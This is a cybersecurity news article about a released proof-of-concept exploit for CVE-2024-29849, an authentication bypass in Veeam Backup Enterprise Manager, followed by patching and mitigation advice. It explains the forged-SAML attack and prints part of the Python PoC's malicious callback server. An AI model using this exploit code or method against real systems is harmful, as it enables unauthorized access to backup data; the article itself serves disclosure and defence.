Saturday, June 15, 2024

PoC Exploit Released For Veeam Authentication Bypass Vulnerability

A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.

This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software. 

CVE-2024-29849: The Vulnerability

On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.

The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.

This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443. 

Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN Start your Analysis

Technical Analysis of the Exploit

The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.

This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.

The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.

Diagram illustrating the authentication bypass exploit process.
Diagram illustrating the authentication bypass exploit process.

Proof of Concept (PoC) Code

The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.

Below is a snippet of the PoC code:

from http.server import HTTPServer, SimpleHTTPRequestHandler

import ssl

import warnings

import base64

import requests

from urllib.parse import urlparse

from threading import Thread

import os

warnings.filterwarnings("ignore", category=DeprecationWarning)

requests.packages.urllib3.disable_warnings()

class CustomHandler(SimpleHTTPRequestHandler):

    def do_POST(self):

        xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">

                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>

                            <saml2:Status>

                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>

                            </saml2:Status>

                          </saml2:Assertion>'''

        self.send_response(200)

        self.send_header("Content-type", "text/xml")

        self.end_headers()

        self.wfile.write(xml_response.encode("utf-8"))

        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")

def start_callback_server(ip, port):

    httpd = HTTPServer((ip, port), CustomHandler)

    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)

    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")

    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)

    print(f"(*) Callback server listening on https://{ip}:{port}")

    httpd.serve_forever()

# Additional code for exploit execution...
Figure 2Snippet of the PoC exploit code.
Figure 2Snippet of the PoC exploit code.

Implications and Mitigation

The release of this PoC exploit underscores the critical nature of CVE-2024-29849.

Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.

An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam has recommended immediate updates to their software’s latest version, including patches to address this vulnerability.

Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation. 

The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.

It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo

Website

Latest articles

Sleepy Pickle Exploit Let Attackers Exploit ML Models And Attack End-Users

Hackers are targeting, attacking, and exploiting ML models. They want to hack into these...

SolarWinds Serv-U Vulnerability Let Attackers Access sensitive files

SolarWinds released a security advisory for addressing a Directory Traversal vulnerability which allows a...

Smishing Triad Hackers Attacking Online Banking, E-Commerce AND Payment Systems Customers

Hackers often attack online banking platforms, e-commerce portals, and payment systems for illicit purposes.Resecurity...

Threat Actor Claiming Leak Of 5 Million Ecuador’s Citizen Database

A threat actor has claimed responsibility for leaking the personal data of 5 million...

Ascension Hack Caused By an Employee Who Downloaded a Malicious File

Ascension, a leading healthcare provider, has made significant strides in its investigation and recovery...

AWS Announced Malware Detection Tool For S3 Buckets

Amazon Web Services (AWS) has announced the general availability of Amazon GuardDuty Malware Protection...

Hackers Exploiting MS Office Editor Vulnerability to Deploy Keylogger

Researchers have identified a sophisticated cyberattack orchestrated by the notorious Kimsuky threat group.The...
Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Free Webinar

API Vulnerability Scanning

71% of the internet traffic comes from APIs so APIs have become soft targets for hackers.Securing APIs is a simple workflow provided you find API specific vulnerabilities and protect them.In the upcoming webinar, join Vivek Gopalan, VP of Products at Indusface as he takes you through the fundamentals of API vulnerability scanning..
Key takeaways include:

  • Scan API endpoints for OWASP API Top 10 vulnerabilities
  • Perform API penetration testing for business logic vulnerabilities
  • Prioritize the most critical vulnerabilities with AcuRisQ
  • Workflow automation for this entire process

Related Articles